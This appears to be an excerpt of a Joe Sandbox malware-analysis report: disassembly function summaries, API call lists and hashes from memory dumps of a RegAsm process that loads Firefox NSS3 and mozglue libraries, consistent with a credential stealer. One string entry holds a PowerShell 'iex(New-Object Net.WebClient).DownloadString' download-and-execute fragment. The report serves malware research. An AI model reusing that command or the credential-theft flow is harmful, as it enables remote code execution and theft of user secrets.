                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prolog$lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
                                                                                    • String ID: "" $')"$*.ps1$-nop -c "iex(New-Object Net.WebClient).DownloadString('$.ps1$<$C:\ProgramData\$C:\ProgramData\$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe$pr
                                                                                    • API String ID: 585178538-2111799918
                                                                                    APIs
                                                                                    • PK11_SignatureLen.NSS3(?), ref: 6CD64D80
                                                                                    • PORT_Alloc_Util.NSS3(00000000), ref: 6CD64D95
                                                                                    • PORT_NewArena_Util.NSS3(00000800), ref: 6CD64DF2
                                                                                    • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CD64E2C
                                                                                    • PR_SetError.NSS3(FFFFE028,00000000), ref: 6CD64E43
                                                                                    • PORT_NewArena_Util.NSS3(00000800), ref: 6CD64E58
                                                                                    • SGN_CreateDigestInfo_Util.NSS3(00000001,?,?), ref: 6CD64E85
                                                                                    • DER_Encode_Util.NSS3(?,?,6CEB05A4,00000000), ref: 6CD64EA7
                                                                                    • PK11_SignWithMechanism.NSS3(?,-00000001,00000000,?,?), ref: 6CD64F17
                                                                                    • DSAU_EncodeDerSigWithLen.NSS3(?,?,?), ref: 6CD64F45
                                                                                    • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CD64F62
                                                                                    • PORT_FreeArena_Util.NSS3(?,00000001), ref: 6CD64F7A
                                                                                    • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CD64F89
                                                                                    • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CD64FC8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537699692.000000006CCD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CCD0000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537650615.000000006CCD0000.00000002.00000001.01000000.00000007.sdmp
                                                                                    • Associated: 00000001.00000002.2538324121.000000006CE6F000.00000002.00000001.01000000.00000007.sdmp
                                                                                    • Associated: 00000001.00000002.2538473689.000000006CEAE000.00000004.00000001.01000000.00000007.sdmp
                                                                                    • Associated: 00000001.00000002.2538508502.000000006CEAF000.00000008.00000001.01000000.00000007.sdmp
                                                                                    • Associated: 00000001.00000002.2538542365.000000006CEB0000.00000004.00000001.01000000.00000007.sdmp
                                                                                    • Associated: 00000001.00000002.2538578827.000000006CEB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6ccd0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Util$Arena_$ErrorFreeItem_K11_WithZfree$Alloc_CreateDigestEncodeEncode_Info_MechanismSignSignature
                                                                                    • String ID:
                                                                                    • API String ID: 2843999940-0
                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC8D85F
                                                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6CC8D86C
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CC8D918
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC8D93C
                                                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6CC8D948
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CC8D970
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC8D976
                                                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6CC8D982
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CC8D9CF
                                                                                    • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6CC8DA2E
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC8DA6F
                                                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6CC8DA78
                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE ref: 6CC8DA91
                                                                                      • Part of subcall function 6CC55C50: GetTickCount64.KERNEL32 ref: 6CC55D40
                                                                                      • Part of subcall function 6CC55C50: EnterCriticalSection.KERNEL32(6CCBF688), ref: 6CC55D67
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CC8DAB7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExclusiveLock$AcquireCurrentReleaseThread$Count64CriticalEnterSectionStampTickTimeV01@@Value@mozilla@@Xbad_function_call@std@@
                                                                                    • String ID:
                                                                                    • API String ID: 1195625958-0
                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC8D4F0
                                                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6CC8D4FC
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CC8D52A
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC8D530
                                                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6CC8D53F
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CC8D55F
                                                                                    • free.MOZGLUE(00000000), ref: 6CC8D585
                                                                                    • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6CC8D5D3
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC8D5F9
                                                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6CC8D605
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CC8D652
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC8D658
                                                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6CC8D667
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CC8D6A2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExclusiveLock$AcquireCurrentReleaseThread$Xbad_function_call@std@@free
                                                                                    • String ID:
                                                                                    • API String ID: 2206442479-0
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00412DDC
                                                                                    • memset.MSVCRT ref: 00412DFD
                                                                                    • memset.MSVCRT ref: 00412E0B
                                                                                      • Part of subcall function 00410D21: SHGetFolderPathA.SHELL32(00000000,;\B,00000000,00000000,?), ref: 00410D52
                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 00412E37
                                                                                    • lstrcat.KERNEL32(?), ref: 00412E55
                                                                                    • lstrcat.KERNEL32(?,?), ref: 00412E69
                                                                                    • lstrcat.KERNEL32(?), ref: 00412E7C
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 00410CDD: _EH_prolog.MSVCRT ref: 00410CE2
                                                                                      • Part of subcall function 00410CDD: GetFileAttributesA.KERNEL32(00000000,?,0040BAC2,?,00425BF6,?,?), ref: 00410CF6
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 0040C186: _EH_prolog.MSVCRT ref: 0040C18B
                                                                                      • Part of subcall function 0040C186: StrStrA.SHLWAPI(00000000,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0040C1DE
                                                                                      • Part of subcall function 0040C186: memcmp.MSVCRT ref: 0040C21C
                                                                                      • Part of subcall function 0040618B: _EH_prolog.MSVCRT ref: 00406190
                                                                                      • Part of subcall function 0040618B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
                                                                                      • Part of subcall function 0040618B: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
                                                                                      • Part of subcall function 0040618B: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
                                                                                      • Part of subcall function 0040618B: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
                                                                                      • Part of subcall function 0040618B: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221
                                                                                      • Part of subcall function 00410F98: GlobalAlloc.KERNEL32(00000000,/A,00000000,00000000,?,00412F0A,?,?), ref: 00410FA3
                                                                                    • StrStrA.SHLWAPI(00000000), ref: 00412F16
                                                                                    • GlobalFree.KERNEL32(?), ref: 00412FE5
                                                                                      • Part of subcall function 00406242: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,004058F9,00000000,00000000), ref: 00406262
                                                                                      • Part of subcall function 00406242: LocalAlloc.KERNEL32(00000040,004058F9,?,?,004058F9,00000000,?,?), ref: 00406270
                                                                                      • Part of subcall function 00406242: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,004058F9,00000000,00000000), ref: 00406286
                                                                                      • Part of subcall function 00406242: LocalFree.KERNEL32(00000000,?,?,004058F9,00000000,?,?), ref: 00406295
                                                                                      • Part of subcall function 004063B1: _EH_prolog.MSVCRT ref: 004063B6
                                                                                      • Part of subcall function 004063B1: memcmp.MSVCRT ref: 004063DC
                                                                                      • Part of subcall function 004063B1: memset.MSVCRT ref: 0040640B
                                                                                      • Part of subcall function 004063B1: LocalAlloc.KERNEL32(00000040,-000000E1,?,?,?,?,00000000,00000000), ref: 00406440
                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 00412F8B
                                                                                    • StrCmpCA.SHLWAPI(?,0042651E,?,?,?,?,000003E8), ref: 00412FA8
                                                                                    • lstrcat.KERNEL32(?,?), ref: 00412FC1
                                                                                    • lstrcat.KERNEL32(?,00426888), ref: 00412FCF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: lstrcat$H_prolog$AllocFileLocal$memset$BinaryCryptFreeGlobalStringmemcmp$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                                                                    • String ID:
                                                                                    • API String ID: 174962345-0
                                                                                    • Opcode ID: c12af0d08b80cfdc46510c18b6634d6eac17fead41f825f8c7138a6c640ef2d0
                                                                                    • Instruction ID: 3957c4cacb1527ca794d6fb4f8c228a0b5d7af048e536104d3bcd38493db67d6
                                                                                    • Opcode Fuzzy Hash: c12af0d08b80cfdc46510c18b6634d6eac17fead41f825f8c7138a6c640ef2d0
                                                                                    • Instruction Fuzzy Hash: 47613EB2D0021DABDF11EBE1DC45DDEBBBDAF18304F00046AF605E3151EA799A988B65
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537699692.000000006CCD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CCD0000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537650615.000000006CCD0000.00000002.00000001.01000000.00000007.sdmp
                                                                                    • Associated: 00000001.00000002.2538324121.000000006CE6F000.00000002.00000001.01000000.00000007.sdmp
                                                                                    • Associated: 00000001.00000002.2538473689.000000006CEAE000.00000004.00000001.01000000.00000007.sdmp
                                                                                    • Associated: 00000001.00000002.2538508502.000000006CEAF000.00000008.00000001.01000000.00000007.sdmp
                                                                                    • Associated: 00000001.00000002.2538542365.000000006CEB0000.00000004.00000001.01000000.00000007.sdmp
                                                                                    • Associated: 00000001.00000002.2538578827.000000006CEB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6ccd0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: free$Unlock$ErrorValuecallocmallocmemcpystrcpystrlen
                                                                                    • String ID:
                                                                                    • API String ID: 786543732-0
                                                                                    • Opcode ID: 25b2e18986cbb662b788d5a22a7fc5daee098e0a7d6b530ed47c2404cb381022
                                                                                    • Instruction ID: 68232e41323b32a9e85d4ee237c221dfa1c48102218282a09ffbce049c9c4c2a
                                                                                    • Opcode Fuzzy Hash: 25b2e18986cbb662b788d5a22a7fc5daee098e0a7d6b530ed47c2404cb381022
                                                                                    • Instruction Fuzzy Hash: 6551ADB1F01216DFDB00DF98DD41AAE77B4BB06358F148035DA19A7A20E331E915CBE6
                                                                                    APIs
                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_APP_RESTART), ref: 6CC556D1
                                                                                    • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CC556E9
                                                                                    • ?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ.MOZGLUE ref: 6CC556F1
                                                                                    • ?TicksFromMilliseconds@BaseTimeDurationPlatformUtils@mozilla@@SA_JN@Z.MOZGLUE ref: 6CC55744
                                                                                    • ??0TimeStampValue@mozilla@@AAE@_K0_N@Z.MOZGLUE(?,?,?,?,?), ref: 6CC557BC
                                                                                    • GetTickCount64.KERNEL32 ref: 6CC558CB
                                                                                    • EnterCriticalSection.KERNEL32(6CCBF688), ref: 6CC558F3
                                                                                    • __aulldiv.LIBCMT ref: 6CC55945
                                                                                    • LeaveCriticalSection.KERNEL32(6CCBF688), ref: 6CC559B2
                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(6CCBF638,?,?,?,?), ref: 6CC559E9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Time$CriticalSectionStampStamp@mozilla@@Value@mozilla@@$BaseComputeCount64DurationEnterFromLeaveMilliseconds@Now@PlatformProcessTickTicksUptime@Utils@mozilla@@V01@@V12@___aulldivgetenv
                                                                                    • String ID: MOZ_APP_RESTART
                                                                                    • API String ID: 2752551254-2657566371
                                                                                    • Opcode ID: e840d3b08470c7dc352ec84a4d26bcb77a8a9f5bec8b314b05cb6f434263e41d
                                                                                    • Instruction ID: 12408110a06ff88b6264ba13c981f0291965a2d368dcbb3d891aac047f195198
                                                                                    • Opcode Fuzzy Hash: e840d3b08470c7dc352ec84a4d26bcb77a8a9f5bec8b314b05cb6f434263e41d
                                                                                    • Instruction Fuzzy Hash: 6DC19B79A083419FCB05CF68C44066ABBF1BFDA714F458A1DE8C497760E730E895CB86
                                                                                    APIs
                                                                                      • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CC44A68), ref: 6CC7945E
                                                                                      • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CC79470
                                                                                      • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CC79482
                                                                                      • Part of subcall function 6CC79420: __Init_thread_footer.LIBCMT ref: 6CC7949F
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC7EC84
                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC7EC8C
                                                                                      • Part of subcall function 6CC794D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CC794EE
                                                                                      • Part of subcall function 6CC794D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CC79508
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC7ECA1
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7ECAE
                                                                                    • ?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000), ref: 6CC7ECC5
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7ED0A
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6CC7ED19
                                                                                    • CloseHandle.KERNEL32(?), ref: 6CC7ED28
                                                                                    • free.MOZGLUE(00000000), ref: 6CC7ED2F
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7ED59
                                                                                    Strings
                                                                                    • [I %d/%d] profiler_ensure_started, xrefs: 6CC7EC94
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExclusiveLockgetenv$CurrentReleaseThread$?profiler_init@baseprofiler@mozilla@@AcquireCloseHandleInit_thread_footerObjectSingleWait__acrt_iob_func__stdio_common_vfprintf_getpidfree
                                                                                    • String ID: [I %d/%d] profiler_ensure_started
                                                                                    • API String ID: 4057186437-125001283
                                                                                    • Opcode ID: 0b5f746ca30ce80bc79f34900e728158a2a719addba06bcce23a0810fa68d7c2
                                                                                    • Instruction ID: 07281a793eb7ed1c1053609bf6e718834aecc0d9380b5e9f9dcdcdc33db649e5
                                                                                    • Opcode Fuzzy Hash: 0b5f746ca30ce80bc79f34900e728158a2a719addba06bcce23a0810fa68d7c2
                                                                                    • Instruction Fuzzy Hash: 3C21F17E600118AFDB109FA8D848ADAB779FF4626CF104214FC1897B41FB719C158BB9
                                                                                    APIs
                                                                                    • PR_LogPrint.NSS3(C_InitToken), ref: 6CD82CEC
                                                                                    • PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 6CD82D07
                                                                                      • Part of subcall function 6CE609D0: PR_Now.NSS3 ref: 6CE60A22
                                                                                      • Part of subcall function 6CE609D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6CE60A35
                                                                                      • Part of subcall function 6CE609D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6CE60A66
                                                                                      • Part of subcall function 6CE609D0: PR_GetCurrentThread.NSS3 ref: 6CE60A70
                                                                                      • Part of subcall function 6CE609D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6CE60A9D
                                                                                      • Part of subcall function 6CE609D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6CE60AC8
                                                                                      • Part of subcall function 6CE609D0: PR_vsmprintf.NSS3(?,?), ref: 6CE60AE8
                                                                                      • Part of subcall function 6CE609D0: EnterCriticalSection.KERNEL32(?), ref: 6CE60B19
                                                                                      • Part of subcall function 6CE609D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CE60B48
                                                                                      • Part of subcall function 6CE609D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CE60C76
                                                                                      • Part of subcall function 6CE609D0: PR_LogFlush.NSS3 ref: 6CE60C7E
                                                                                    • PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6CD82D22
                                                                                      • Part of subcall function 6CE609D0: OutputDebugStringA.KERNEL32(?), ref: 6CE60B88
                                                                                      • Part of subcall function 6CE609D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6CE60C5D
                                                                                      • Part of subcall function 6CE609D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6CE60C8D
                                                                                      • Part of subcall function 6CE609D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CE60C9C
                                                                                      • Part of subcall function 6CE609D0: OutputDebugStringA.KERNEL32(?), ref: 6CE60CD1
                                                                                      • Part of subcall function 6CE609D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6CE60CEC
                                                                                      • Part of subcall function 6CE609D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CE60CFB
                                                                                      • Part of subcall function 6CE609D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CE60D16
                                                                                      • Part of subcall function 6CE609D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6CE60D26
                                                                                      • Part of subcall function 6CE609D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CE60D35
                                                                                      • Part of subcall function 6CE609D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6CE60D65
                                                                                      • Part of subcall function 6CE609D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6CE60D70
                                                                                      • Part of subcall function 6CE609D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CE60D90
                                                                                      • Part of subcall function 6CE609D0: free.MOZGLUE(00000000), ref: 6CE60D99
                                                                                    • PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6CD82D3B
                                                                                      • Part of subcall function 6CE609D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6CE60BAB
                                                                                      • Part of subcall function 6CE609D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CE60BBA
                                                                                      • Part of subcall function 6CE609D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CE60D7E
                                                                                    • PR_LogPrint.NSS3( pLabel = 0x%p,?), ref: 6CD82D54
                                                                                      • Part of subcall function 6CE609D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CE60BCB
                                                                                      • Part of subcall function 6CE609D0: EnterCriticalSection.KERNEL32(?), ref: 6CE60BDE
                                                                                      • Part of subcall function 6CE609D0: OutputDebugStringA.KERNEL32(?), ref: 6CE60C16
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537699692.000000006CCD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CCD0000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537650615.000000006CCD0000.00000002.00000001.01000000.00000007.sdmp
                                                                                    • Associated: 00000001.00000002.2538324121.000000006CE6F000.00000002.00000001.01000000.00000007.sdmp
                                                                                    • Associated: 00000001.00000002.2538473689.000000006CEAE000.00000004.00000001.01000000.00000007.sdmp
                                                                                    • Associated: 00000001.00000002.2538508502.000000006CEAF000.00000008.00000001.01000000.00000007.sdmp
                                                                                    • Associated: 00000001.00000002.2538542365.000000006CEB0000.00000004.00000001.01000000.00000007.sdmp
                                                                                    • Associated: 00000001.00000002.2538578827.000000006CEB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6ccd0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugOutputString$Printfflush$fwrite$CriticalEnterR_snprintfSection$CurrentExplodeFlushR_vsmprintfR_vsnprintfThreadTimefputcfreememcpystrlen
                                                                                    • String ID: pLabel = 0x%p$ pPin = 0x%p$ slotID = 0x%x$ ulPinLen = %d$C_InitToken$nl
                                                                                    • API String ID: 420000887-3348607798
                                                                                    • Opcode ID: 0f1379c0620fe92460866e2f4922ea9ec95a65d54e4c0d78f6dc7520c3a492c2
                                                                                    • Instruction ID: 00f87d5ab00c034bb19a5b8043e78a68d4b3011f3d46c88aeb9daaaa095c4a70
                                                                                    • Opcode Fuzzy Hash: 0f1379c0620fe92460866e2f4922ea9ec95a65d54e4c0d78f6dc7520c3a492c2
                                                                                    • Instruction Fuzzy Hash: B721DA76602144EFDB019F54DF4CA693FB2EF8231DF548064E90897A72D7709849CBB5
                                                                                    APIs
                                                                                      • Part of subcall function 6CC3EB30: free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC3EB83
                                                                                    • ?FormatToStringSpan@MarkerSchema@mozilla@@CA?AV?$Span@$$CBD$0PPPPPPPP@@2@W4Format@12@@Z.MOZGLUE(?,?,00000004,?,?,?,?,?,?,6CC7B392,?,?,00000001), ref: 6CC791F4
                                                                                      • Part of subcall function 6CC6CBE8: GetCurrentProcess.KERNEL32(?,6CC331A7), ref: 6CC6CBF1
                                                                                      • Part of subcall function 6CC6CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CC331A7), ref: 6CC6CBFA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$CurrentFormatFormat@12@@MarkerP@@2@Schema@mozilla@@Span@Span@$$StringTerminatefree
                                                                                    • String ID: data$marker-chart$marker-table$name$stack-chart$timeline-fileio$timeline-ipc$timeline-memory$timeline-overview
                                                                                    • API String ID: 3790164461-3347204862
